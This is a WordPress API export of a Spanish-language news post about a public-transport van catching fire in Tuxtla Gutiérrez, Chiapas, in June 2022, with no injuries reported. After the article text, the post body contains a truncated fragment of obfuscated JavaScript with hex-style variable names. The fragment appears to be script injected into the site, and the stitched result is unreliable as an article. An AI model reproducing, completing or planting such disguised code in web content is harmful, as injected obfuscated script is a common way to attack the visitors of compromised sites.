{"id":2579,"date":"2022-06-03T01:33:57","date_gmt":"2022-06-03T01:33:57","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2579"},"modified":"2022-06-03T01:33:58","modified_gmt":"2022-06-03T01:33:58","slug":"se-incendia-colectivo-en-la-colonia-industrial-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2579","title":{"rendered":"Se incendia colectivo en la Colonia Industrial de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220602-WA0011-1024x768.jpg\" alt=\"\" class=\"wp-image-2580\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220602-WA0011-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220602-WA0011-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220602-WA0011-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220602-WA0011-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220602-WA0011.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><div> Jairo Camacho. Agencia ReporteCiudadano, 2 de junio del 2022. Tuxtla Guti\u00e9rrez.- Este jueves por la tarde un colectivo de la ruta 102 se incendi\u00f3 por causas desconocidas cuando circulaba en calles de la Colonia Industrial de Tuxtla Guti\u00e9rrez. De acuerdo con testigos, de manera repentina el conductor par\u00f3 la unidad pues sal\u00edan las llamas de la parte del motor.De manera inmediata, llamaron a los n\u00fameros de emergencia y los elementos del Cuerpo de Bomberos combatieron las llamas hasta apagarlas.En el lugar se inform\u00f3 que, a pesar lo aparatoso del siniestro no hubo heridos ni v\u00edctimas que lamentar.Elementos de tr\u00e1nsito ordenaron el levantamiento de la unidad y trasladarla a un corral\u00f3n en turno para deslindar responsabilidades.<\/div><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 2 de junio del 2022. Tuxtla Guti\u00e9rrez.- Este jueves por la tarde un colectivo de la ruta 102 se incendi\u00f3 por causas desconocidas cuando circulaba en calles de la Colonia Industrial de Tuxtla Guti\u00e9rrez. De acuerdo con testigos, de manera repentina el conductor par\u00f3 la unidad pues sal\u00edan las llamas de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2580,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-2579","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2579","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2579"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2579\/revisions"}],"predecessor-version":[{"id":2581,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2579\/revisions\/2581"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2580"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2579"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2579"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2579"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}